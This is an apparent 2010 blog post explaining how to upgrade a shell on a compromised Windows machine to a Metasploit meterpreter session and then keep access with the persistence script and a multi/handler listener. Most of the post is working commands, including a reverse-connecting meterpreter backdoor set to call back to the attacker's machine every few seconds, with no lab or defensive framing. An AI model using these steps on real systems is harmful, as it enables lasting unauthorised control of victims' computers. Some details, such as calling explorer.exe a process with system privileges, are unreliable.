Thursday, June 17, 2010

Upgrading from shell to meterpreter and then adding persistence

Say you compromised a box and installed a backdoor that provides you with shell acess. You connect to the backdoor listener and would like to do alot more than what the windows command prompt will allow you to do. Like most of us, we will want access to the meterpreter ("Google meterpreter if you don't have a clue what it is"). We can perform an upgrade on our regular shell to a meterpreter session using metasploit.

you can follow the examples on:

Just a quick summary.
After you connect to the listener on victim machine:
[ctrl z] to background the session
# setg LHOST ip_addr //this the ip of machine of the attacker with metasploit
# setg LPORT port_num //set port num to use for the upgraded session
# session -u 1 //where one is the session number of the regular shell session

I've only gotten this working when the victim machine had the backdoor or service waiting for shell connections, meaning that when i compromised the box, i used a bind_shell payload or the victim had some kind of listener that would give you shell access when connected like netcat. I could not get this working when using a reverse_tcp shell payload initially.

When you have a meterpreter session, to add a persistent reverse connecting meterpreter client you can use the "persistence" script with options as follows:

meterpreter> run persistence -A -i 5 -p 4444 -r

'-A' : Automatically starts a mtaching multi/handler to connect listen for incoming connections
'-i' : Interval in seconds between each connection attempt
'-p' : port on the remote host where metasploit is listening
'-r' :IP of the system running the metasploit listener

if you opted to not use the '-A' option, you can always start up the multi/handler manually

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lport=4444 lhost= E

I've had one instance where when i got the reverse meterpreter session connected then disconnected, it refused to automatically connect again. I really had no answer for that problem at the time but what worked for me is that i had to migrate to a process with system priveledges (like explorer.exe) then disconnect. The script then was continually sending its reversing connections as it should back to my metasploit box.

Resources / Good Reading:

No comments:

Post a Comment